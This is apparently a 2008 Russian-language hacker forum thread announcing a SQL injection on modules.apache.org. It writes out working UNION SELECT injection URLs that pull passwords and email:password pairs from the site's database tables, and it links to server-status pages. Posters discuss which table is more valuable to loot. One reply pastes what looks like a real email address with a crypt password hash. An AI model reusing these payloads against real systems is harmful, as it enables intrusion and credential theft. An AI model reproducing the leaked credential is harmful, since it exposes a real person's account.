![]() |
apache.org
SQL Injection на apache.org
Найдено: 28.07.2008 Вот что нашёл : Код:
http://modules.apache.org/search.php?id=-1+union+select+password,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18+from+module/*Код:
http://modules.apache.org/search.php?id=-1+union+select+concat_ws(0x3a,aemail,apassword),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18+from+access/*Apache Server Status http://apache.org/server-status Apache Server Information http://apache.org/servinfo Видео: http://xakername.ifolder.ru/7501509 |
таблица access,не так ценна как таблица module (поля url;password;maintemail)
;) |
coder5@topmail.kz:antichat.ru:$1$rkR4HaMX$mYg01WrY 9/fWMc7TY/Qp
Впадлу розбиратся((( |
так просто :)
|
| Время: 12:42 |